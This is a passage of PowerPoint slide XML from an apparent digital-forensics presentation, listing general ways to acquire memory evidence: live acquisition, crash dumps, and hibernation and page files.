                    <a:pt x="159410" y="1075931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1103325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1134554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1169289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1207147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1247813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1290916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1336103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1383030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1429969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1475155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1518259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1558925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1596783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1631518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1662747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1690141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1713344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1731987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1745754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1757172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1745754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1731987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1713344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1690141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1662747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1631518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1596783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1558925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1518259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1475155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1429969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743712" y="1383030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="2950464" y="374142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2947555" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939097" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925432" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906890" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883827" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856611" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2825559" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2791041" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2753410" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2712999" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2670162" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625242" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578608" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531961" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487041" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2444204" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403792" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2366162" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331643" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300592" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2273376" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231771" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218105" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209647" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206752" y="374142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209647" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218105" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231771" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2273376" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300592" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331643" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2366162" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403792" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2444204" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487041" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531961" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578608" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625242" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2670162" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2712999" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2753410" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2791041" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2825559" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856611" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883827" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906890" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925432" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939097" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2947555" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950464" y="374142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="5155692" y="1483614"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1436687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1391500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1348397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1307731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1235138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1203909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1176515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1153312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1134668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1120902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1112393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1109472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1112393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1120902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1134668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1153312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1176515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1203909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1235138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1307731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1348397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1391500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1436687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4411980" y="1483614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1530553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1575739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1618843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1659509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1697367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1732102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1763331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1790725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1813928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1832571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1846338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1854847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1857756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1854847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1846338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1832571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1813928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1790725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1763331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1732102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1697367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1659509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1618843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1575739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1530553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5155692" y="1483614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705347" y="5923915"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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17581" y="6024753"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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81682" y="5294147"/>
            <a:ext cx="3413125" cy="155638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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Live</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-125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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="12700" marR="5080" indent="-635">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>pre-install </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>driver</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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145">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-64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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>interest.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14999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="-50"/>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70"/>
              <a:t>helps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="30"/>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35"/>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-70"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50"/>
              <a:t>non-persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35"/>
              <a:t>analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="45"/>
              <a:t>contents</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60"/>
              <a:t>temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-645"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="40"/>
              <a:t>systems,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-25"/>
              <a:t>data,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="25"/>
              <a:t>connections,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="40"/>
              <a:t>cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5"/>
              <a:t>keys,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-70"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85"/>
              <a:t>etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50"/>
              <a:t>contents'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-10"/>
              <a:t>collected</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="25"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60"/>
              <a:t>methods:</a:t>
            </a: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250"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="43815">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Crash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130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pc="155" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5345430" marR="5387340" indent="-1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>helps </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recover </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>disk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="40640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2265"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="-50" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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090275" y="5201818"/>
            <a:ext cx="3692525" cy="15043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700" marR="5080" indent="-2540">
              <a:lnSpc>
                <a:spcPct val="110200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hibernation </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="135" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="105" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-650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-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>decompresses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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-114">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
